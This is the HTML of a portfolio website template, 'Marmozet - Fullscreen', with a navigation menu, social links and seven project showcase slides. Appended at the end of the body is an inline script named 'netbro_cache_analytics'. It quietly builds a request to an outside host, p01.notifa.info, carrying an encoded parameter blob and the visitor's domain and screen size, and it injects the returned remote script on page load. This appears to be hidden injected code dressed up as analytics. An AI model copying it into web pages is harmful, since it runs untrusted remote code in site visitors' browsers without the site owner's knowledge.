<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Marmozet - Fullscreen</title>
   
    <link rel="stylesheet" href="assets/vendor/font-awesome-5/css/fontawesome-all.min.css">
    <link rel="stylesheet" href="assets/css/custom.css">
    <link rel="stylesheet" href="assets/css/main.css">
    <link rel="stylesheet" href="assets/css/fullsreen-showcase.css">
    <link rel="stylesheet" href="assets/css/responsive-fullsreen.css">
</head>

<body>
    <!-- Preloader  -->
    <div id="preloader">
        <div class="loader-logo text-center">
            <img src="assets/img/logo.png" alt="">
            <p>Please Wait</p>
        </div>
    </div>
    <div class="loader">
        <div class="block_first"></div>
        <div class="block_second"></div>
    </div>

    <!-- Navbar -->
    <nav>
        <div class="">
            <div class="nav-burger c-magnetic">
                <div class="span">
                    <div class="toggle-btn link empty-cursor">
                        <div class="burger-menu">
                            <span class="one"></span>
                            <span class="two"></span>
                            <span class="tre"></span>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <div class="bg_block_first"></div>
        <div class="bg_block_second"></div>

        <div class="manu-container">
            <div class="menu">
                <div class="data">
                    <div class="links">
                        <ul>
                            <li><span class="menu-link multi-start">Works</span>
                                <ul class="multimenu">
                                    <li><a class="link load-marmoset" href="index.html">Fullscreen</a></li>
                                    <li><a class="link load-marmoset" href="home-single.html">Single</a></li>
                                    <li><a class="link load-marmoset" href="home-multi-vert.html">Multi</a></li>
                                </ul>
                            </li>
                            <li><a class="menu-link multi-leave link load-marmoset" href="about.html">About</a></li>
                            <li><a class="menu-link multi-leave link load-marmoset" href="blog-sidebar.html">Blog</a></li>
                            <li><a class="menu-link multi-leave link load-marmoset" href="contact.html">Contact</a></li>
                            <li><a class="menu-link multi-leave link load-marmoset" href="index.html">Buy Now</a></li>
                        </ul>
                    </div>

                </div>

            </div>
        </div>
    </nav>
    <!-- Logo -->
    <div class="logo">
        <a class="link" href="index.html"><img src="assets/img/logo.png" alt="logo"></a>
    </div>

    <!-- Custom Cursor -->
    <div class="cursor"></div>
    <div class="cursor-follower"></div>
    <div class="up-down">
        <div class="to-up c-magnetic empty-cursor">
            <div class="span">
                <div class="circle">
                    <div class="arrow"></div>
                </div>
            </div>
        </div>
        <div class="to-down c-magnetic empty-cursor">
            <div class="span">
                <div class="circle">
                    <div class="arrow"></div>
                </div>
            </div>
        </div>
    </div>
    <div class="swiper-pagination"></div>
    <!-- social media -->
    <div class="social">
        <ul>
            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-facebook" aria-hidden="true"></i>
                    </a>
                </span>
            </li>

            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-instagram" aria-hidden="true"></i>
                    </a>
                </span>
            </li>

            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-twitter" aria-hidden="true"></i>
                    </a>
                </span>
            </li>

            <li class="c-magnetic">
                <span>
                    <a class="link span" href="#" target="_blank">
                        <i class="fab fa-behance" aria-hidden="true"></i>
                    </a>
                </span>
            </li>
        </ul>
    </div>

    <div class="copyright">
        <p>&copy; cingunt 2019</p>
    </div>

    <!-- Scroll Animimation -->
    <div class="c-scroll-icon">
        <p>SCROLL</p>
        <div class="c-scroll-icon-line-mask">
            <div class="c-scroll-icon-line"></div>
        </div>
        <div class="c-scroll-icon-triangle">
            <div class="c-scroll-icon-triangle-mask first">
                <div class="c-scroll-icon-triangle-line first"></div>
            </div>
            <div class="c-scroll-icon-triangle-mask right">
                <div class="c-scroll-icon-triangle-line right"></div>
            </div>
            <div class="c-scroll-icon-triangle-mask left">
                <div class="c-scroll-icon-triangle-line left"></div>
            </div>
            <div class="c-scroll-icon-triangle-mask last">
                <div class="c-scroll-icon-triangle-line last"></div>
            </div>
        </div>
    </div>



    <!-- border main -->
    <div class="border-fixed"></div>

    <div class="swiper-container">

        <div class="swiper-wrapper">

            <!-- Start Project 00 -->
            <div class="swiper-slide">

                <div class="title-work">
                    <!-- Project Title -->
                    <h2>
                        <span class="head-text">Future</span>
                    </h2>
                    <!-- Project Tag -->
                    <div class="tag-head">
                        <ul class="tag-work">
                            <li>Web Design</li>
                            <li>Visual Art</li>
                            <li>Branding</li>
                        </ul>
                    </div>
                    <!-- Project Button -->
                    <div class="c-magnetic">
                        <div class="span">
                            <div class="btn-discover">
                                <a class="load-marmoset" href="single-project.html">
                                    <div class="learn-more empty-cursor">
                                        <div class="circle">
                                            <span class="icon arrow"></span>
                                        </div>
                                        <p class="button-text">DISCOVER</p>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>

                </div>
                <!-- Project Background -->
                <div class="bg">
                    <div class="overlay-bg"></div>
                    <div class="project-img project-0"></div>
                </div>
                <!-- overlay on slide -->
                <div class="overlay-swipe">
                    <div class="over-1"></div>
                    <div class="over-2"></div>
                    <div class="over-3"></div>
                    <div class="over-4"></div>
                    <div class="over-5"></div>

                    <div class="over-1-border"></div>
                    <div class="over-2-border"></div>
                    <div class="over-3-border"></div>
                    <div class="over-4-border"></div>
                </div>
            </div>
            <!-- End Project 00 -->

            <!-- Start Project 01 -->
            <div class="swiper-slide">

                <div class="title-work">
                    <!-- Project Title -->
                    <h2>
                        <span class="head-text">Hidden School</span>
                    </h2>
                    <!-- Project Tag -->
                    <div class="tag-head">
                        <ul class="tag-work">
                            <li>Web Design</li>
                            <li>Visual Art</li>
                            <li>Branding</li>
                        </ul>
                    </div>
                    <!-- Project Button -->
                    <div class="c-magnetic">
                        <div class="span">
                            <div class="btn-discover">
                                <a class="load-marmoset" href="single-project.html">
                                    <div class="learn-more empty-cursor">
                                        <div class="circle">
                                            <span class="icon arrow"></span>
                                        </div>
                                        <p class="button-text">DISCOVER</p>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>

                </div>
                <!-- Project Background -->
                <div class="bg">
                    <div class="overlay-bg"></div>
                    <div class="project-img project-1"></div>
                </div>

                <!-- overlay on slide -->
                <div class="overlay-swipe">
                    <div class="over-1"></div>
                    <div class="over-2"></div>
                    <div class="over-3"></div>
                    <div class="over-4"></div>
                    <div class="over-5"></div>

                    <div class="over-1-border"></div>
                    <div class="over-2-border"></div>
                    <div class="over-3-border"></div>
                    <div class="over-4-border"></div>
                </div>
            </div>
            <!-- End Project 01 -->


            <!-- Start Project 02 -->
            <div class="swiper-slide">
                <div class="title-work">
                    <!-- Project Title -->
                    <h2>
                        <span class="head-text">Adventures</span>
                    </h2>
                    <!-- Project Tag -->
                    <div class="tag-head">
                        <ul class="tag-work">
                            <li>Photography</li>
                            <li>Visual Art</li>
                            <li>Direction</li>
                        </ul>
                    </div>
                    <!-- Project Button -->
                    <div class="c-magnetic">
                        <div class="span">
                            <div class="btn-discover">
                                <a class="load-marmoset" href="single-project.html">
                                    <div class="learn-more empty-cursor">
                                        <div class="circle">
                                            <span class="icon arrow"></span>
                                        </div>
                                        <p class="button-text">DISCOVER</p>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
                <!-- Project Background -->
                <div class="bg">
                    <div class="overlay-bg"></div>
                    <div class="project-img project-2"></div>
                </div>
                <!-- overlay on slide -->
                <div class="overlay-swipe">
                    <div class="over-1"></div>
                    <div class="over-2"></div>
                    <div class="over-3"></div>
                    <div class="over-4"></div>
                    <div class="over-5"></div>

                    <div class="over-1-border"></div>
                    <div class="over-2-border"></div>
                    <div class="over-3-border"></div>
                    <div class="over-4-border"></div>
                </div>
            </div>
            <!-- End Project 02 -->


            <!-- Start Project 03 -->
            <div class="swiper-slide">
                <div class="title-work">
                    <!-- Project Title -->
                    <h2>
                        <span class="head-text">Yuvva</span>
                    </h2>
                    <!-- Project Tag -->
                    <div class="tag-head">
                        <ul class="tag-work">
                            <li>Web Design</li>
                            <li>Visual Art</li>
                            <li>Branding</li>
                        </ul>
                    </div>
                    <!-- Project Button -->
                    <div class="c-magnetic">
                        <div class="span">
                            <div class="btn-discover">
                                <a class="load-marmoset" href="single-project.html">
                                    <div class="learn-more empty-cursor">
                                        <div class="circle">
                                            <span class="icon arrow"></span>
                                        </div>
                                        <p class="button-text">DISCOVER</p>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- Project Background -->
                <div class="bg">
                    <div class="overlay-bg"></div>
                    <div class="project-img project-3"></div>
                </div>
                <!-- overlay on slide -->
                <div class="overlay-swipe">
                    <div class="over-1"></div>
                    <div class="over-2"></div>
                    <div class="over-3"></div>
                    <div class="over-4"></div>
                    <div class="over-5"></div>

                    <div class="over-1-border"></div>
                    <div class="over-2-border"></div>
                    <div class="over-3-border"></div>
                    <div class="over-4-border"></div>
                </div>
            </div>
            <!-- End Project 03 -->

            <!-- Start Project 04 -->
            <div class="swiper-slide">
                <div class="title-work">
                    <!-- Project Title -->
                    <h2>
                        <span class="head-text">Castle la</span>
                    </h2>
                    <!-- Project Tag -->
                    <div class="tag-head">
                        <ul class="tag-work">
                            <li>Web Design</li>
                            <li>Visual Art</li>
                            <li>Branding</li>
                        </ul>
                    </div>
                    <!-- Project Button -->
                    <div class="c-magnetic">
                        <div class="span">
                            <div class="btn-discover">
                                <a class="load-marmoset" href="single-project.html">
                                    <div class="learn-more empty-cursor">
                                        <div class="circle">
                                            <span class="icon arrow"></span>
                                        </div>
                                        <p class="button-text">DISCOVER</p>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- Project Background -->
                <div class="bg">
                    <div class="overlay-bg"></div>
                    <div class="project-img project-4"></div>
                </div>
                <!-- overlay on slide -->
                <div class="overlay-swipe">
                    <div class="over-1"></div>
                    <div class="over-2"></div>
                    <div class="over-3"></div>
                    <div class="over-4"></div>
                    <div class="over-5"></div>

                    <div class="over-1-border"></div>
                    <div class="over-2-border"></div>
                    <div class="over-3-border"></div>
                    <div class="over-4-border"></div>
                </div>
            </div>
            <!-- End Project 04 -->

            <!-- Start Project 05 -->
            <div class="swiper-slide">
                <div class="title-work">
                    <!-- Project Title -->
                    <h2>
                        <span class="head-text">After Hours</span>
                    </h2>
                    <!-- Project Tag -->
                    <div class="tag-head">
                        <ul class="tag-work">
                            <li>Web Design</li>
                            <li>Visual Art</li>
                            <li>Branding</li>
                        </ul>
                    </div>
                    <!-- Project Button -->
                    <div class="c-magnetic">
                        <div class="span">
                            <div class="btn-discover">
                                <a class="load-marmoset" href="single-project.html">
                                    <div class="learn-more empty-cursor">
                                        <div class="circle">
                                            <span class="icon arrow"></span>
                                        </div>
                                        <p class="button-text">DISCOVER</p>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
                <!-- Project Background -->
                <div class="bg">
                    <div class="overlay-bg"></div>
                    <div class="project-img project-5"></div>
                </div>
                <!-- overlay on slide -->
                <div class="overlay-swipe">
                    <div class="over-1"></div>
                    <div class="over-2"></div>
                    <div class="over-3"></div>
                    <div class="over-4"></div>
                    <div class="over-5"></div>

                    <div class="over-1-border"></div>
                    <div class="over-2-border"></div>
                    <div class="over-3-border"></div>
                    <div class="over-4-border"></div>
                </div>
            </div>
            <!-- End Project 05 -->

            <!-- Start Project 06 -->
            <div class="swiper-slide">
                <div class="title-work">
                    <!-- Project Title -->
                    <h2>
                        <span class="head-text">Morning Dew</span>
                    </h2>
                    <!-- Project Tag -->
                    <div class="tag-head">
                        <ul class="tag-work">
                            <li>Web Design</li>
                            <li>Visual Art</li>
                            <li>Branding</li>
                        </ul>
                    </div>
                    <!-- Project Button -->
                    <div class="c-magnetic">
                        <div class="span">
                            <div class="btn-discover">
                                <a class="load-marmoset" href="single-project.html">
                                    <div class="learn-more empty-cursor">
                                        <div class="circle">
                                            <span class="icon arrow"></span>
                                        </div>
                                        <p class="button-text">DISCOVER</p>
                                    </div>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>

                <!-- Project Background -->
                <div class="bg">
                    <div class="overlay-bg"></div>
                    <div class="project-img project-6"></div>
                </div>
                <!-- overlay on slide -->
                <div class="overlay-swipe">
                    <div class="over-1"></div>
                    <div class="over-2"></div>
                    <div class="over-3"></div>
                    <div class="over-4"></div>
                    <div class="over-5"></div>

                    <div class="over-1-border"></div>
                    <div class="over-2-border"></div>
                    <div class="over-3-border"></div>
                    <div class="over-4-border"></div>
                </div>
            </div>
            <!-- End Project 06 -->

        </div>
    </div>


    <script src="assets/js/plugin.js"></script>
    <script src="assets/js/fullsreen-showcase.js"></script>
    <script src="assets/js/main.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "p01.notifa.info/3fsmd3/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582Am8lISurprAUiWnkSN8PMSjgCF0aOX9P1NO%2baoafmo5HBPAxuM4gk2qYNnCn9t5Bo1enzkHUtWocibHgkv50CnJ%2f1D8k0oTLRdfDIRhfMNy1AhAI%2fh8N9rfJNQ2BmFjLypkGTAhXvAU1rHbtFWf5Nfg2KQIIIuCph8KW7oRFTwmgmAc%2bqHq5Hq4vkyJqAl3G93DvfZVDsKlvnsFN6Zbvwv%2baVjcEDJ6MHp9sxBXuKYBKCFm0gGPqmP7VnxIzFkbZs2rMAhN4d6hA%2f4KGscVESzkVpVDFSFDZlbkUuJDB6UlHtIDF8T0YcK8LdA%2bCGQPVEBCYFQw9HNz%2fTc17lekB7MkBn%2bb6e3Q4mzgHBW0kL0UpyvQLuoSp3f2zSKd9mIwg%2f6yyCFdLB4xpE1rcilxFDpvE2AhWchpNiZin%2bFxIDoCFGQwWHle2OSlJRe8tfYKZlpv5UPi1Sem4hXSFO59jj%2bcy3Kuy5MUAt9jtDxT7BrvaqT5U5hasVE%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

</html>